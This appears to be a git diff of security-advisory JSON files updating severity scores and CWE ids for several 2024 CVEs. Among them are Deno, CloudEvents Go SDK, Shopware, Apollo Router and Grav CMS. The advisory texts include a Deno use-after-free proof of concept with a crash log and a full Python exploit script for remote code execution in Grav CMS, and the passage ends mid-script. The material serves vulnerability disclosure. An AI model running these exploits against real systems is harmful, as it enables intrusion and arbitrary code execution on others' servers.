"2024-03-06T17:04:40Z", + "modified": "2026-02-17T19:38:52Z", "published": "2024-03-06T17:04:29Z", "aliases": [ "CVE-2024-27934" ], "summary": "*const c_void / ExternalPointer unsoundness leading to use-after-free", - "details": "### Summary\n\nUse of inherently unsafe `*const c_void` and `ExternalPointer` leads to use-after-free access of the underlying structure, resulting in arbitrary code execution.\n\n\n### Details\n\n`*const c_void` and `ExternalPointer` (defined via `external!()` macros) types are used to represent `v8::External` wrapping arbitrary `void*` with an external lifetime. This is inherently unsafe as we are effectively eliding all Rust lifetime safety guarantees.\n\n`*const c_void` is trivially unsafe. `ExternalPointer` attempts to resolve this issue by wrapping the underlying pointer with a `usize`d marker ([`ExternalWithMarker`](https://github.com/denoland/deno_core/blob/a2838062a8f51926140a48a8aa926330c6f9070c/core/external.rs#L49)).\n\nHowever, the marker [relies on the randomness of PIE address (binary base address)](https://github.com/denoland/deno_core/blob/a2838062a8f51926140a48a8aa926330c6f9070c/core/external.rs#L10) which is still trivially exploitable for a non-PIE binary. It is also equally exploitable on a PIE binary when an attacker is able to derandomize the PIE address. This is problematic as it escalates an information leak of the PIE address into an exploitable vulnerability.\n\nNote that an attacker able to control code executed inside the Deno runtime is very likely to be able to bypass ASLR with any means necessary (e.g. by chaining another vulnerability, or by using other granted permissions such as `--allow-read` to read `/proc/self/maps`).\n\n\n### PoC\n\nFor simplicity, we use Deno version 1.38.0 where streaming operations uses `*const c_void`. Testing environment is Docker image `denoland/deno:alpine-1.38.0@sha256:fe51a00f4fbbaf1e72b29667c3eeeda429160cef2342f22a92c3820020d41f38` although the exact versions shouldn't matter much if it's in 1.36.2 up to 1.38.0 (before `ExternalPointer` patch, refer Impact section for details)\n\n```js\nconst ops = Deno[Deno.internal].core.ops;\nconst rid = ops.op_readable_stream_resource_allocate();\nconst sink = ops.op_readable_stream_resource_get_sink(rid);\n\n// close\nops.op_readable_stream_resource_close(sink);\nops.op_readable_stream_resource_close(sink);\n\n// reclaim BoundedBufferChannelInner\nconst ab = new ArrayBuffer(0x8058);\nconst dv = new DataView(ab);\n\n// forge chunk contents\ndv.setBigUint64(0, 2n, true);\ndv.setBigUint64(0x8030, 0x1337c0d30000n, true);\n\n// trigger segfault\nDeno.close(rid);\n```\n\nBelow is the dmesg log after the crash. We see that Deno has segfaulted on `1337c0d30008`, which is +8 of what we have written at offset 0x8030. Note also that the dereferenced value will immediately be used as a function pointer, with the first argument dereferenced from offset 0x8038 - it is trivial to use this to build an end-to-end exploit.\n\n```text\n[ 6439.821046] deno[15088]: segfault at 1337c0d30008 ip 0000557b53e2fb3e sp 00007fffd485ac70 error 4 in deno[557b51714000+2d7f000] likely on CPU 12 (core 12, socket 0)\n[ 6439.821054] Code: 00 00 00 00 48 85 c0 74 03 ff 50 08 49 8b 86 30 80 00 00 49 8b be 38 80 00 00 49 c7 86 30 80 00 00 00 00 00 00 48 85 c0 74 03 50 08 48 ff 03 48 83 c4 08 5b 41 5e c3 48 8d 3d 0d 1a 59 fb 48\n```\n\nThe same vulnerability exists for `ExternalPointer` implementation, but now it is required for the attacker to either leak the PIE address somehow, or else exploit unexpected aliasing behavior of `v8::External` values. The latter has not been investigated in depth, but it is theoretically possible to alias the same underlying pointer to different `v8::External` on different threads (Workers) and exploit the concurrency (`RefCell` may break this though).\n\n\n### Impact\n\nUse of inherently unsafe `*const c_void` and `ExternalPointer` leads to use-after-free access of the underlying structure, which is exploitable by an attacker controlling the code executed inside a Deno runtime to obtain arbitrary code execution on the host machine regardless of permissions.\n\nThis bug is **known to be exploitable** for both `*const c_void` and `ExternalPointer` implementations.\n\nAffected versions of Deno is from 1.36.2 up to latest.\n\n- [ext/web/stream_resource.rs](https://github.com/denoland/deno/blob/main/ext/web/stream_resource.rs):\n - `*const c_void` introduced in 1.36.2\n - Patched into `ExternalPointer` in 1.38.1\n- [ext/http/http_next.rs](https://github.com/denoland/deno/blob/main/ext/http/http_next.rs):\n - `ExternalPointer` introduced in 1.38.2\n", - "severity": [], + "details": "### Summary\n\nUse of inherently unsafe `*const c_void` and `ExternalPointer` leads to use-after-free access of the underlying structure, resulting in arbitrary code execution.\n\n\n### Details\n\n`*const c_void` and `ExternalPointer` (defined via `external!()` macros) types are used to represent `v8::External` wrapping arbitrary `void*` with an external lifetime. This is inherently unsafe as we are effectively eliding all Rust lifetime safety guarantees.\n\n`*const c_void` is trivially unsafe. `ExternalPointer` attempts to resolve this issue by wrapping the underlying pointer with a `usize`d marker ([`ExternalWithMarker`](https://github.com/denoland/deno_core/blob/a2838062a8f51926140a48a8aa926330c6f9070c/core/external.rs#L49)).\n\nHowever, the marker [relies on the randomness of PIE address (binary base address)](https://github.com/denoland/deno_core/blob/a2838062a8f51926140a48a8aa926330c6f9070c/core/external.rs#L10) which is still trivially exploitable for a non-PIE binary. It is also equally exploitable on a PIE binary when an attacker is able to derandomize the PIE address. This is problematic as it escalates an information leak of the PIE address into an exploitable vulnerability.\n\nNote that an attacker able to control code executed inside the Deno runtime is very likely to be able to bypass ASLR with any means necessary (e.g. by chaining another vulnerability, or by using other granted permissions such as `--allow-read` to read `/proc/self/maps`).\n\n\n### PoC\n\nFor simplicity, we use Deno version 1.38.0 where streaming operations uses `*const c_void`. Testing environment is Docker image `denoland/deno:alpine-1.38.0@sha256:fe51a00f4fbbaf1e72b29667c3eeeda429160cef2342f22a92c3820020d41f38` although the exact versions shouldn't matter much if it's in 1.36.2 up to 1.38.0 (before `ExternalPointer` patch, refer Impact section for details)\n\n```js\nconst ops = Deno[Deno.internal].core.ops;\nconst rid = ops.op_readable_stream_resource_allocate();\nconst sink = ops.op_readable_stream_resource_get_sink(rid);\n\n// close\nops.op_readable_stream_resource_close(sink);\nops.op_readable_stream_resource_close(sink);\n\n// reclaim BoundedBufferChannelInner\nconst ab = new ArrayBuffer(0x8058);\nconst dv = new DataView(ab);\n\n// forge chunk contents\ndv.setBigUint64(0, 2n, true);\ndv.setBigUint64(0x8030, 0x1337c0d30000n, true);\n\n// trigger segfault\nDeno.close(rid);\n```\n\nBelow is the dmesg log after the crash. We see that Deno has segfaulted on `1337c0d30008`, which is +8 of what we have written at offset 0x8030. Note also that the dereferenced value will immediately be used as a function pointer, with the first argument dereferenced from offset 0x8038 - it is trivial to use this to build an end-to-end exploit.\n\n```text\n[ 6439.821046] deno[15088]: segfault at 1337c0d30008 ip 0000557b53e2fb3e sp 00007fffd485ac70 error 4 in deno[557b51714000+2d7f000] likely on CPU 12 (core 12, socket 0)\n[ 6439.821054] Code: 00 00 00 00 48 85 c0 74 03 ff 50 08 49 8b 86 30 80 00 00 49 8b be 38 80 00 00 49 c7 86 30 80 00 00 00 00 00 00 48 85 c0 74 03 50 08 48 ff 03 48 83 c4 08 5b 41 5e c3 48 8d 3d 0d 1a 59 fb 48\n```\n\nThe same vulnerability exists for `ExternalPointer` implementation, but now it is required for the attacker to either leak the PIE address somehow, or else exploit unexpected aliasing behavior of `v8::External` values. The latter has not been investigated in depth, but it is theoretically possible to alias the same underlying pointer to different `v8::External` on different threads (Workers) and exploit the concurrency (`RefCell` may break this though).\n\n\n### Impact\n\nUse of inherently unsafe `*const c_void` and `ExternalPointer` leads to use-after-free access of the underlying structure, which is exploitable by an attacker controlling the code executed inside a Deno runtime to obtain arbitrary code execution on the host machine regardless of permissions.\n\nThis bug is **known to be exploitable** for both `*const c_void` and `ExternalPointer` implementations.\n\nAffected versions of Deno is from 1.36.2 up to latest.\n\n- [ext/web/stream_resource.rs](https://github.com/denoland/deno/blob/main/ext/web/stream_resource.rs):\n - `*const c_void` introduced in 1.36.2\n - Patched into `ExternalPointer` in 1.38.1\n- [ext/http/http_next.rs](https://github.com/denoland/deno/blob/main/ext/http/http_next.rs):\n - `ExternalPointer` introduced in 1.38.2", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H" + } + ], "affected": [ { "package": { @@ -41,10 +46,12 @@ } ], "database_specific": { - "cwe_ids": [], - "severity": "MODERATE", + "cwe_ids": [ + "CWE-416" + ], + "severity": "HIGH", "github_reviewed": true, "github_reviewed_at": "2024-03-06T17:04:29Z", - "nvd_published_at": null + "nvd_published_at": "2024-03-21T02:52:22Z" } } \ No newline at end of file diff --git a/advisories/github-reviewed/2024/03/GHSA-5pf6-2qwx-pxm2/GHSA-5pf6-2qwx-pxm2.json b/advisories/github-reviewed/2024/03/GHSA-5pf6-2qwx-pxm2/GHSA-5pf6-2qwx-pxm2.json index b817c8d243bea..7a72186d272b4 100644 --- a/advisories/github-reviewed/2024/03/GHSA-5pf6-2qwx-pxm2/GHSA-5pf6-2qwx-pxm2.json +++ b/advisories/github-reviewed/2024/03/GHSA-5pf6-2qwx-pxm2/GHSA-5pf6-2qwx-pxm2.json @@ -1,14 +1,19 @@ { "schema_version": "1.4.0", "id": "GHSA-5pf6-2qwx-pxm2", - "modified": "2024-03-12T15:22:22Z", + "modified": "2026-02-17T19:40:16Z", "published": "2024-03-06T20:11:59Z", "aliases": [ "CVE-2024-28110" ], "summary": "Go SDK for CloudEvents's use of WithRoundTripper to create a Client leaks credentials", - "details": "### Impact\n_What kind of vulnerability is it? Who is impacted?_\nUsing cloudevents.WithRoundTripper to create a cloudevents.Client with an authenticated http.RoundTripper causes the go-sdk to leak credentials to arbitrary endpoints.\n\nThe relevant code is [here](https://github.com/cloudevents/sdk-go/blob/67e389964131d55d65cd14b4eb32d57a47312695/v2/protocol/http/protocol.go#L104-L110) (also inline, emphasis added):\n\n
if p.Client == nil {\n  p.Client = **http.DefaultClient**\n}\n\nif p.roundTripper != nil {\n  p.Client.**Transport = p.roundTripper**\n}\n
\n\nWhen the transport is populated with an authenticated transport such as:\n- [oauth2.Transport](https://pkg.go.dev/golang.org/x/oauth2#Transport)\n- [idtoken.NewClient(...).Transport](https://pkg.go.dev/google.golang.org/api/idtoken#NewClient)\n\n... then http.DefaultClient is modified with the authenticated transport and will start to send Authorization tokens to\n**any endpoint** it is used to contact!\n\nFound and patched by: @tcnghia and @mattmoor\n\n### Patches\nv.2.15.2\n", - "severity": [], + "details": "### Impact\n_What kind of vulnerability is it? Who is impacted?_\nUsing cloudevents.WithRoundTripper to create a cloudevents.Client with an authenticated http.RoundTripper causes the go-sdk to leak credentials to arbitrary endpoints.\n\nThe relevant code is [here](https://github.com/cloudevents/sdk-go/blob/67e389964131d55d65cd14b4eb32d57a47312695/v2/protocol/http/protocol.go#L104-L110) (also inline, emphasis added):\n\n
if p.Client == nil {\n  p.Client = **http.DefaultClient**\n}\n\nif p.roundTripper != nil {\n  p.Client.**Transport = p.roundTripper**\n}\n
\n\nWhen the transport is populated with an authenticated transport such as:\n- [oauth2.Transport](https://pkg.go.dev/golang.org/x/oauth2#Transport)\n- [idtoken.NewClient(...).Transport](https://pkg.go.dev/google.golang.org/api/idtoken#NewClient)\n\n... then http.DefaultClient is modified with the authenticated transport and will start to send Authorization tokens to\n**any endpoint** it is used to contact!\n\nFound and patched by: @tcnghia and @mattmoor\n\n### Patches\nv.2.15.2", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N" + } + ], "affected": [ { "package": { @@ -52,8 +57,10 @@ } ], "database_specific": { - "cwe_ids": [], - "severity": "MODERATE", + "cwe_ids": [ + "CWE-522" + ], + "severity": "HIGH", "github_reviewed": true, "github_reviewed_at": "2024-03-06T20:11:59Z", "nvd_published_at": "2024-03-06T22:15:57Z" diff --git a/advisories/github-reviewed/2024/03/GHSA-c2f9-4jmm-v45m/GHSA-c2f9-4jmm-v45m.json b/advisories/github-reviewed/2024/03/GHSA-c2f9-4jmm-v45m/GHSA-c2f9-4jmm-v45m.json index 38ea09ccfe953..0d40371e3ebe4 100644 --- a/advisories/github-reviewed/2024/03/GHSA-c2f9-4jmm-v45m/GHSA-c2f9-4jmm-v45m.json +++ b/advisories/github-reviewed/2024/03/GHSA-c2f9-4jmm-v45m/GHSA-c2f9-4jmm-v45m.json @@ -1,14 +1,19 @@ { "schema_version": "1.4.0", "id": "GHSA-c2f9-4jmm-v45m", - "modified": "2024-03-06T15:06:54Z", + "modified": "2026-02-17T22:02:24Z", "published": "2024-03-06T15:06:54Z", "aliases": [ "CVE-2024-27917" ], "summary": "Shopware's session is persistent in Cache for 404 pages", - "details": "### Impact\n\nThe Symfony Session Handler, pop's the Session Cookie and assign it to the Response. Since Shopware 6.5.8.0 the 404 pages, are cached, to improve the performance of 404 pages. So the cached Response, contains a Session Cookie when the Browser accessing the 404 page, has no cookies yet. The Symfony Session Handler is in use, when no explicit Session configuration has been done.\nWhen Redis is in use for Sessions using the PHP Redis extension, this exploiting code is not used.\n\n### Patches\nUpdate to Shopware version 6.5.8.7\n\n### Workarounds\nUsing Redis for Sessions, as this does not trigger the exploit code. Example configuration for Redis\n\n```ini\n# php.ini\nsession.save_handler = redis\nsession.save_path = \"tcp://127.0.0.1:6379\"\n```\n\n## Consequences\n\nAs an guest browser session has been cached on a 404 page, every missing image or directly reaching a 404 page will logout the customer or clear his cart.\n", - "severity": [], + "details": "### Impact\n\nThe Symfony Session Handler, pop's the Session Cookie and assign it to the Response. Since Shopware 6.5.8.0 the 404 pages, are cached, to improve the performance of 404 pages. So the cached Response, contains a Session Cookie when the Browser accessing the 404 page, has no cookies yet. The Symfony Session Handler is in use, when no explicit Session configuration has been done.\nWhen Redis is in use for Sessions using the PHP Redis extension, this exploiting code is not used.\n\n### Patches\nUpdate to Shopware version 6.5.8.7\n\n### Workarounds\nUsing Redis for Sessions, as this does not trigger the exploit code. Example configuration for Redis\n\n```ini\n# php.ini\nsession.save_handler = redis\nsession.save_path = \"tcp://127.0.0.1:6379\"\n```\n\n## Consequences\n\nAs an guest browser session has been cached on a 404 page, every missing image or directly reaching a 404 page will logout the customer or clear his cart.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N" + } + ], "affected": [ { "package": { @@ -75,9 +80,9 @@ "cwe_ids": [ "CWE-524" ], - "severity": "CRITICAL", + "severity": "HIGH", "github_reviewed": true, "github_reviewed_at": "2024-03-06T15:06:54Z", - "nvd_published_at": null + "nvd_published_at": "2024-03-06T20:15:48Z" } } \ No newline at end of file diff --git a/advisories/github-reviewed/2024/03/GHSA-cgqf-3cq5-wvcj/GHSA-cgqf-3cq5-wvcj.json b/advisories/github-reviewed/2024/03/GHSA-cgqf-3cq5-wvcj/GHSA-cgqf-3cq5-wvcj.json index 392aeb4725b74..315f3eb069e6a 100644 --- a/advisories/github-reviewed/2024/03/GHSA-cgqf-3cq5-wvcj/GHSA-cgqf-3cq5-wvcj.json +++ b/advisories/github-reviewed/2024/03/GHSA-cgqf-3cq5-wvcj/GHSA-cgqf-3cq5-wvcj.json @@ -1,14 +1,19 @@ { "schema_version": "1.4.0", "id": "GHSA-cgqf-3cq5-wvcj", - "modified": "2024-03-06T18:24:17Z", + "modified": "2026-02-17T19:37:19Z", "published": "2024-03-06T18:24:17Z", "aliases": [ "CVE-2024-28101" ], "summary": "Apollo Router's Compressed Payloads do not respect HTTP Payload Limits", - "details": "### Impact\nThe Apollo Router is a configurable, high-performance graph router written in Rust to run a federated supergraph that uses Apollo Federation. Affected versions are subject to a Denial-of-Service (DoS) type vulnerability. When receiving compressed HTTP payloads, affected versions of the Router evaluate the `limits.http_max_request_bytes` configuration option after the entirety of the compressed payload is decompressed. If affected versions of the Router receive highly compressed payloads, this could result in significant memory consumption while the compressed payload is expanded. \n\n### Patches\nRouter version 1.40.2 has a fix for the vulnerability.\n\n### Workarounds\nIf you are unable to upgrade, you may be able to implement mitigations at proxies or load balancers positioned in front of your Router fleet (e.g. Nginx, HAProxy, or cloud-native WAF services) by creating limits on HTTP body upload size. \n", - "severity": [], + "details": "### Impact\nThe Apollo Router is a configurable, high-performance graph router written in Rust to run a federated supergraph that uses Apollo Federation. Affected versions are subject to a Denial-of-Service (DoS) type vulnerability. When receiving compressed HTTP payloads, affected versions of the Router evaluate the `limits.http_max_request_bytes` configuration option after the entirety of the compressed payload is decompressed. If affected versions of the Router receive highly compressed payloads, this could result in significant memory consumption while the compressed payload is expanded. \n\n### Patches\nRouter version 1.40.2 has a fix for the vulnerability.\n\n### Workarounds\nIf you are unable to upgrade, you may be able to implement mitigations at proxies or load balancers positioned in front of your Router fleet (e.g. Nginx, HAProxy, or cloud-native WAF services) by creating limits on HTTP body upload size.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H" + } + ], "affected": [ { "package": { @@ -48,9 +53,9 @@ "cwe_ids": [ "CWE-409" ], - "severity": "MODERATE", + "severity": "HIGH", "github_reviewed": true, "github_reviewed_at": "2024-03-06T18:24:17Z", - "nvd_published_at": null + "nvd_published_at": "2024-03-21T02:52:23Z" } } \ No newline at end of file diff --git a/advisories/github-reviewed/2024/03/GHSA-f6g2-h7qv-3m5v/GHSA-f6g2-h7qv-3m5v.json b/advisories/github-reviewed/2024/03/GHSA-f6g2-h7qv-3m5v/GHSA-f6g2-h7qv-3m5v.json index cedc93372d406..d074f2bee2ed8 100644 --- a/advisories/github-reviewed/2024/03/GHSA-f6g2-h7qv-3m5v/GHSA-f6g2-h7qv-3m5v.json +++ b/advisories/github-reviewed/2024/03/GHSA-f6g2-h7qv-3m5v/GHSA-f6g2-h7qv-3m5v.json @@ -1,14 +1,19 @@ { "schema_version": "1.4.0", "id": "GHSA-f6g2-h7qv-3m5v", - "modified": "2024-03-06T16:58:33Z", + "modified": "2026-02-17T19:39:34Z", "published": "2024-03-06T16:58:33Z", "aliases": [ "CVE-2024-27923" ], "summary": "Remote Code Execution by uploading a phar file using frontmatter", - "details": "### Summary\n- Due to insufficient permission verification, user who can write a page use frontmatter feature.\n- Inadequate File Name Validation\n\n### Details\n1. Insufficient Permission Verification\n\nIn Grav CMS, \"[Frontmatter](https://learn.getgrav.org/17/content/headers)\" refers to the metadata block located at the top of a Markdown file. Frontmatter serves the purpose of providing additional information about a specific page or post.\nIn this feature, only administrators are granted access, while regular users who can create pages are not. However, if a regular user adds the data[_json][header][form] parameter to the POST Body while creating a page, they can use Frontmatter. The demonstration of this vulnerability is provided in video format. [Video Link](https://www.youtube.com/watch?v=EU1QA0idoWE)\n\n2. Inadequate File Name Validation\n\nTo create a Contact Form, Frontmatter and markdown can be written as follows:\n[Contact Form Example](https://learn.getgrav.org/17/forms/forms/example-form)\n[Form Action Save Option](https://learn.getgrav.org/17/forms/forms/reference-form-actions#save)\nWhen an external user submits the Contact Form after filling it out, the data is stored in the user/data folder. The filename under which the data is stored corresponds to the value specified in the filename attribute of the process property. For instance, if the filename attribute has a value of \"feedback.txt,\" a feedback.txt file is created in the user/data/contact folder. This file contains the value entered by the user in the \"name\" field. The problem with this functionality is the lack of validation for the filename attribute, potentially allowing the creation of files such as phar files on the server. An attacker could input arbitrary PHP code into the \"name\" field to be saved on the server. However, Grav filter the < and > characters, so to disable these options, an xss_check: false attribute should be added. [Disable XSS](https://learn.getgrav.org/17/forms/forms/form-options#xss-checks)\n\n```\n---\ntitle: Contact Form\n\nform:\n name: contact\n xss_check: false\n\n fields:\n name:\n label: Name\n placeholder: Enter your name\n autocomplete: on\n type: text\n validate:\n required: true\n\n buttons:\n submit:\n type: submit\n value: Submit\n\n process:\n save:\n filename: this_is_file_name.phar\n operation: add\n\n---\n\n# Contact form\n\nSome sample page content\n```\n\nExploiting these two vulnerabilities allows the following scenario:\n\n- A regular user account capable of creating pages is required.\n- An attacker creates a Contact Form page containing malicious Frontmatter using the regular user's account.\n- Accessing the Contact Form page, the attacker submits PHP code.\n- The attacker attempts Remote Code Execution by accessing HOST/user/data/[form-name]/[filename].\n\n### PoC\n\n[PoC Video Link](https://www.youtube.com/watch?v=Gh3ezpORbPc)\n\n```python\n# PoC.py\nimport requests\nfrom bs4 import BeautifulSoup\n\nclass Poc:\n\n def __init__(self, cmd):\n self.sess = requests.Session()\n\n ########## INIT ################\n self.USERNAME = \"guest\"\n self.PASSWORD = \"Guest123!\"\n self.PREFIX_URL = \"http://192.168.12.119:8888/grav\"\n self.PAGE_NAME = \"this_is_poc_page47\"\n self.PHP_FILE_NAME = \"universe.phar\"\n self.PAYLOAD = ''\n self.cmd = cmd\n ########## END ################\n\n self.sess.get(self.PREFIX_URL)\n self._login()\n self._save_page()\n self._inject_command()\n self._execute_command()\n \n\n def _get_nonce(self, data, name):\n # Get login nonce value\n res = BeautifulSoup(data, \"html.parser\")\n return res.find(\"input\", {\"name\" : name}).get(\"value\")\n\n \n def _login(self):\n print(\"[*] Try to Login\")\n res = self.sess.get(self.PREFIX_URL + \"/admin\")\n\n login_nonce = self._get_nonce(res.text, \"login-nonce\")\n\n # Login\n login_data = {\n \"data[username]\" : self.USERNAME,\n \"data[password]\" : self.PASSWORD,\n \"task\" : \"login\",\n \"login-nonce\" : login_nonce\n }\n res = self.sess.post(self.PREFIX_URL + \"/admin\", data=login_data)\n\n # Check login\n if res.status_code != 303:\n print(\"[!] username or password is wrong\")\n exit()\n \n print(\"[*] Success Login\")\n\n\n def _save_page(self):\n print(\"[*] Try to write page\")\n\n res = self.sess.get(self.PREFIX_URL + f\"/admin/pages/{self.PAGE_NAME}/:add\")\n form_nonce = self._get_nonce(res.text, \"form-nonce\")\n unique_form_id = self._get_nonce(res.text, \"__unique_form_id__\")\n\n # Add page data\n page_data = f\"task=save&data%5Bheader%5D%5Btitle%5D={self.PAGE_NAME}&data%5Bcontent%5D=content&data%5Bheader%5D%5Bsearch%5D=&data%5Bfolder%5D={self.PAGE_NAME}&data%5Broute%5D=&data%5Bname%5D=form&data%5Bheader%5D%5Bbody_classes%5D=&data%5Bordering%5D=1&data%5Border%5D=&data%5Bheader%5D%5Border_by%5D=&data%5Bheader%5D%5Border_manual%5D=&data%5Bblueprint%5D=&data%5Blang%5D=&_post_entries_save=edit&__form-name__=flex-pages&__unique_form_id__={unique_form_id}&form-nonce={form_nonce}&toggleable_data%5Bheader%5D%5Bpublished%5D=0&toggleable_data%5Bheader%5D%5Bdate%5D=0&toggleable_data%5Bheader%5D%5Bpublish_date%5D=0&toggleable_data%5Bheader%5D%5Bunpublish_date%5D=0&toggleable_data%5Bheader%5D%5Bmetadata%5D=0&toggleable_data%5Bheader%5D%5Bdateformat%5D=0&toggleable_data%5Bheader%5D%5Bmenu%5D=0&toggleable_data%5Bheader%5D%5Bslug%5D=0&toggleable_data%5Bheader%5D%5Bredirect%5D=0&toggleable_data%5Bheader%5D%5Bprocess%5D=0&toggleable_data%5Bheader%5D%5Btwig_first%5D=0&toggleable_data%5Bheader%5D%5Bnever_cache_twig%5D=0&toggleable_data%5Bheader%5D%5Bchild_type%5D=0&toggleable_data%5Bheader%5D%5Broutable%5D=0&toggleable_data%5Bheader%5D%5Bcache_enable%5D=0&toggleable_data%5Bheader%5D%5Bvisible%5D=0&toggleable_data%5Bheader%5D%5Bdebugger%5D=0&toggleable_data%5Bheader%5D%5Btemplate%5D=0&toggleable_data%5Bheader%5D%5Bappend_url_extension%5D=0&toggleable_data%5Bheader%5D%5Bredirect_default_route%5D=0&toggleable_data%5Bheader%5D%5Broutes%5D%5Bdefault%5D=0&toggleable_data%5Bheader%5D%5Broutes%5D%5Bcanonical%5D=0&toggleable_data%5Bheader%5D%5Broutes%5D%5Baliases%5D=0&toggleable_data%5Bheader%5D%5Badmin%5D%5Bchildren_display_order%5D=0&toggleable_data%5Bheader%5D%5Blogin%5D%5Bvisibility_requires_access%5D=0\"\n page_data += f\"&data%5B_json%5D%5Bheader%5D%5Bform%5D=%7B%22xss_check%22%3Afalse%2C%22name%22%3A%22contact-form%22%2C%22fields%22%3A%7B%22name%22%3A%7B%22label%22%3A%22Name%22%2C%22placeholder%22%3A%22Enter+php+code%22%2C%22autofocus%22%3A%22on%22%2C%22autocomplete%22%3A%22on%22%2C%22type%22%3A%22text%22%2C%22validate%22%3A%7B%22required%22%3Atrue%7D%7D%7D%2C%22process%22%3A%7B%22save%22%3A%7B%22filename%22%3A%22{self.PHP_FILE_NAME}%22%2C%22operation%22%3A%22add%22%7D%7D%2C%22buttons%22%3A%7B%22submit%22%3A%7B%22type%22%3A%22submit%22%2C%22value%22%3A%22Submit%22%7D%7D%7D\"\n res = self.sess.post(self.PREFIX_URL + f\"/admin/pages/{self.PAGE_NAME}/:add\" , data = page_data, headers = {'Content-Type': 'application/x-www-form-urlencoded'})\n\n print(\"[*] Success write page: \" + self.PREFIX_URL + f\"/{self.PAGE_NAME}\")\n\n\n def _inject_command(self):\n print(\"[*] Try to inject php code\")\n\n res = self.sess.get(self.PREFIX_URL + f\"/{self.PAGE_NAME}\")\n form_nonce = self._get_nonce(res.text, \"form-nonce\")\n unique_form_id = self._get_nonce(res.text, \"__unique_form_id__\")\n\n form_data = f\"data%5Bname%5D={self.PAYLOAD}&__form-name__=contact-form&__unique_form_id__={unique_form_id}&form-nonce={form_nonce}\"\n\n res = self.sess.post(self.PREFIX_URL + f\"/{self.PAGE_NAME}\" , data = form_data, headers = {'Content-Type': 'application/x-www-form-urlencoded'})\n\n print(\"[*] Success inject php code\")\n\n\n def _execute_command(self):\n res = self.sess.get(self.PREFIX_URL + f\"/user/data/contact-form/{self.PHP_FILE_NAME}?cmd={self.cmd}\")\n\n if res.status_code == 404:\n print(\"[!] Fail to execute command or not save php file.\")\n exit()\n\n print(\"[*] This is uploaded php file url.\")\n print(self.PREFIX_URL + f\"/user/data/contact-form/{self.PHP_FILE_NAME}?cmd={self.cmd}\")\n print(res.text)\n\n\nif __name__ == \"__main__\":\n Poc(cmd=\"id\")\n```\n\n### Impact\n\nRemote Code Execution\n", - "severity": [], + "details": "### Summary\n- Due to insufficient permission verification, user who can write a page use frontmatter feature.\n- Inadequate File Name Validation\n\n### Details\n1. Insufficient Permission Verification\n\nIn Grav CMS, \"[Frontmatter](https://learn.getgrav.org/17/content/headers)\" refers to the metadata block located at the top of a Markdown file. Frontmatter serves the purpose of providing additional information about a specific page or post.\nIn this feature, only administrators are granted access, while regular users who can create pages are not. However, if a regular user adds the data[_json][header][form] parameter to the POST Body while creating a page, they can use Frontmatter. The demonstration of this vulnerability is provided in video format. [Video Link](https://www.youtube.com/watch?v=EU1QA0idoWE)\n\n2. Inadequate File Name Validation\n\nTo create a Contact Form, Frontmatter and markdown can be written as follows:\n[Contact Form Example](https://learn.getgrav.org/17/forms/forms/example-form)\n[Form Action Save Option](https://learn.getgrav.org/17/forms/forms/reference-form-actions#save)\nWhen an external user submits the Contact Form after filling it out, the data is stored in the user/data folder. The filename under which the data is stored corresponds to the value specified in the filename attribute of the process property. For instance, if the filename attribute has a value of \"feedback.txt,\" a feedback.txt file is created in the user/data/contact folder. This file contains the value entered by the user in the \"name\" field. The problem with this functionality is the lack of validation for the filename attribute, potentially allowing the creation of files such as phar files on the server. An attacker could input arbitrary PHP code into the \"name\" field to be saved on the server. However, Grav filter the < and > characters, so to disable these options, an xss_check: false attribute should be added. [Disable XSS](https://learn.getgrav.org/17/forms/forms/form-options#xss-checks)\n\n```\n---\ntitle: Contact Form\n\nform:\n name: contact\n xss_check: false\n\n fields:\n name:\n label: Name\n placeholder: Enter your name\n autocomplete: on\n type: text\n validate:\n required: true\n\n buttons:\n submit:\n type: submit\n value: Submit\n\n process:\n save:\n filename: this_is_file_name.phar\n operation: add\n\n---\n\n# Contact form\n\nSome sample page content\n```\n\nExploiting these two vulnerabilities allows the following scenario:\n\n- A regular user account capable of creating pages is required.\n- An attacker creates a Contact Form page containing malicious Frontmatter using the regular user's account.\n- Accessing the Contact Form page, the attacker submits PHP code.\n- The attacker attempts Remote Code Execution by accessing HOST/user/data/[form-name]/[filename].\n\n### PoC\n\n[PoC Video Link](https://www.youtube.com/watch?v=Gh3ezpORbPc)\n\n```python\n# PoC.py\nimport requests\nfrom bs4 import BeautifulSoup\n\nclass Poc:\n\n def __init__(self, cmd):\n self.sess = requests.Session()\n\n ########## INIT ################\n self.USERNAME = \"guest\"\n self.PASSWORD = \"Guest123!\"\n self.PREFIX_URL = \"http://192.168.12.119:8888/grav\"\n self.PAGE_NAME = \"this_is_poc_page47\"\n self.PHP_FILE_NAME = \"universe.phar\"\n self.PAYLOAD = ''\n self.cmd = cmd\n ########## END ################\n\n self.sess.get(self.PREFIX_URL)\n self._login()\n self._save_page()\n self._inject_command()\n self._execute_command()\n \n\n def _get_nonce(self, data, name):\n # Get login nonce value\n res = BeautifulSoup(data, \"html.parser\")\n return res.find(\"input\", {\"name\" : name}).get(\"value\")\n\n \n def _login(self):\n print(\"[*] Try to Login\")\n res = self.sess.get(self.PREFIX_URL + \"/admin\")\n\n login_nonce = self._get_nonce(res.text, \"login-nonce\")\n\n # Login\n login_data = {\n \"data[username]\" : self.USERNAME,\n \"data[password]\" : self.PASSWORD,\n \"task\" : \"login\",\n \"login-nonce\" : login_nonce\n }\n res = self.sess.post(self.PREFIX_URL + \"/admin\", data=login_data)\n\n # Check login\n if res.status_code != 303:\n print(\"[!] username or password is wrong\")\n exit()\n \n print(\"[*] Success Login\")\n\n\n def _save_page(self):\n print(\"[*] Try to write page\")\n\n res = self.sess.get(self.PREFIX_URL + f\"/admin/pages/{self.PAGE_NAME}/:add\")\n form_nonce = self._get_nonce(res.text, \"form-nonce\")\n unique_form_id = self._get_nonce(res.text, \"__unique_form_id__\")\n\n # Add page data\n page_data = 